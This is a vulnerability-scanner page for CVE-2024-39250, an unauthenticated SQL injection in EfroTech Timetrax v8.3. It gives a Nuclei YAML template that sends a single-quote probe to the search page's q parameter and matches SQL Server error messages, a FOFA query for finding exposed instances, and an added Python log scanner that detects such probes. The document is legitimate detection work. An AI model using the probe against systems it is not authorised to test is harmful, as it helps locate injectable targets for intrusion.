EfroTech Timetrax v8.3 - Sql Injection
ID: CVE-2024-39250
Severity: high
Author: s4e-io,efran
Tags: cve,cve2024,sqli,timetrax
Description
EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.
YAML Source
id: CVE-2024-39250

info:
  name: EfroTech Timetrax v8.3 - Sql Injection
  author: s4e-io,efran
  severity: high
  description: |
    EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39250
    - https://www.tenable.com/cve/CVE-2024-39250
    - https://github.com/efrann/CVE-2024-39250
    - https://vuldb.com/?id.272268
  classification:
    epss-score: 0.00043
    epss-percentile: 0.09359
  metadata:
    vendor: efroTech
    product: timetrax
    fofa-query: icon_hash="-661694518"
  tags: cve,cve2024,sqli,timetrax

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /Login.aspx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"TimeTrax - Cloud HR Software")'
          - 'contains(content_type, "text/html")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /search.aspx?q=' HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Incorrect syntax near","Unclosed quotation mark after the character string")'
          - 'contains(content_type, "text/html")'
          - "status_code == 500"
        condition: and
# digest: 4b0a00483046022100abf24393503d37b661c568b0ce3413448e233056975273c95627f48c5a8f2e630221008b4c3b98140527ad406e4c3388e98a5b1691cd6afdd9260f0da4eb999c461b01:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-39250.yaml"
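
The same check seen from the server side, as an added example that is not part of the template or the Nuclei project: it scans web server logs for requests to /search.aspx whose q parameter contains a single quote, and separates those answered with the 500 status that the template's second matcher requires. It assumes IIS W3C extended logging with a `#Fields` header; the function names and the log lines are constructed for illustration.

```python
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended log format (assumed layout, not from the page).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-07-01 10:00:01 GET /Login.aspx - 203.0.113.7 200
2024-07-01 10:00:02 GET /search.aspx q=' 203.0.113.7 500
2024-07-01 10:00:09 GET /search.aspx q=O%27Brien 198.51.100.4 200
2024-07-01 10:01:30 GET /search.aspx q=payroll 198.51.100.4 200
2024-07-01 10:02:11 GET /SEARCH.ASPX Q=%27 192.0.2.55 500
"""


def quote_in_q(query):
    """True if a q parameter (any case) holds a single quote after URL decoding."""
    if query == "-":  # IIS writes "-" for an empty query string
        return False
    params = parse_qs(query, keep_blank_values=True)
    return any("'" in value
               for name, values in params.items() if name.lower() == "q"
               for value in values)


def find_probes(log_text):
    """Return (timestamp, client_ip, status, verdict) for quoted q values on /search.aspx."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if row.get("cs-uri-stem", "").lower() != "/search.aspx":
            continue
        if not quote_in_q(row.get("cs-uri-query", "-")):
            continue
        status = row.get("sc-status", "")
        # 500 is the status the template's second matcher requires; the SQL error
        # strings it also checks are in the response body, which the log lacks.
        verdict = "error-on-quote" if status == "500" else "quote-only"
        stamp = f'{row.get("date", "")} {row.get("time", "")}'
        hits.append((stamp, row.get("c-ip", ""), status, verdict))
    return hits


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(*hit)
```

A "quote-only" hit can be an ordinary search such as a surname with an apostrophe; "error-on-quote" is the combination worth triaging first.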